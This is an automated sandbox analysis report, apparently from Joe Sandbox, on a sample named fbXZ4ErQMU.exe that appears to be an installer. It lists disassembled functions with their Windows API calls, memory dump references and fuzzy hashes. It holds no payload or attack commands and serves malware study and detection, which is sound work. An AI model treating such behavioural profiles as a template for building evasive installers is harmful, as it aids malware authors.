                                                          Download Yara Rule
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                          Function 70052921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(7005404C,00000004,00000040,7005403C), ref: 7005293F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 08fa498c831ed0198e4c602dbf5b0246b99bc1b581c5534920356d536e1b1b0c
                                                          • Instruction ID: c1c453edea60cd1cb07df67bc54b9271dca96556d54e3eb12db22aca028c8887
                                                          • Opcode Fuzzy Hash: 08fa498c831ed0198e4c602dbf5b0246b99bc1b581c5534920356d536e1b1b0c
                                                          • Instruction Fuzzy Hash: FEF092B3508380DEE760CF7A8C44F863EF0A719678B31692AE798D62E1E3B440488B11
                                                          Function 004023E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                          • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                          • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                          • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                          Function 00405F7D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                          • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                          • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                          • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                          Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                          • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                          • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                          • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                          Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                          Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                            • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                            • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                            • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                            • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                          • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                          • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                          • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                          Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                          • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                          • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                          • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628

                                                          Non-executed Functions

                                                          Function 0040535C Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                          • GetClientRect.USER32(?,?), ref: 00405407
                                                          • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                          • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                          • ShowWindow.USER32(00000000), ref: 00405554
                                                          • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                          • ShowWindow.USER32(00000008), ref: 004055A1
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                          • CreatePopupMenu.USER32 ref: 004055E6
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                          • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                          • OpenClipboard.USER32(00000000), ref: 00405680
                                                          • EmptyClipboard.USER32 ref: 00405686
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                          • CloseClipboard.USER32 ref: 004056D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                          • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                          • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                          • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                          Function 0040460D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                          • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: /!s$A$C:\Users\user\tranchet$Call
                                                          • API String ID: 2624150263-228845616
                                                          • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                          • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                          • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                          • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                          Function 00406945 Relevance: .3, Instructions: 334COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                          • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                          Function 0040711C Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                          • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                          Function 00404B80 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 491windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                          • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
